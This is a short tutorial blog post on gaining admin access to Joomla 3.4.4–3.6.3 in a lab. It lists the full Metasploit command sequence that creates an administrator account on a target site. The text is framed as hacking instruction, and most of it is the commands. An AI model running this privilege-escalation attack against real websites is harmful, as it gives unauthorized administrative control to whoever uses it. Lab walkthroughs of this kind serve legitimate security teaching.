In this article we will learn about hacking Joomla CMS. And to so we will be a pre-instaled module of metasploit which will further help us to create an autocratic account with administrative privileges in Joomla versions 3.4.4 through 3.6.3. Ttherefore, if an email server is arranged in Joomla, an email will be sent to activate the account (the account is disabled by default).
Exploit Targets
Joomla 3.4.4 through 3.6.3
Requirement
Attacker: kali Linux
Victim PC: Joomla 3.4.4
Open terminal in Kali and type msfconsole to start metasploit.
Once metasploit is opened then type the following commands to execute the attack:
use auxiliary/admin/http/joomla_registration_privsec
msf exploit (joomla_registration_privsec)>set rhost 192.168.0.103
msf exploit (joomla_registration_privsec)>set username raj
msf exploit (joomla_registration_privsec)>set password raj123
msf exploit (joomla_registration_privsec)>set email raj@hackingarticles.in
msf exploit (joomla_registration_privsec)>set targeturi /joomla
msf exploit (joomla_registration_privsec)>exploit
Performing this attack will allow you to create a desirable username and password like in this case I have given username : raj and password : raj123 along with email ID : raj@hackingarticles.in
In the image below you can see that a new user will be created by the username and passwords that you provided.
And as you have created a username you can log in using the said username.
Thus, you can hack Joomla CMS in the most simplest of the way.
The post Exploiting Joomla Website using Account Creation and Privilege Escalation appeared first on Hacking Articles.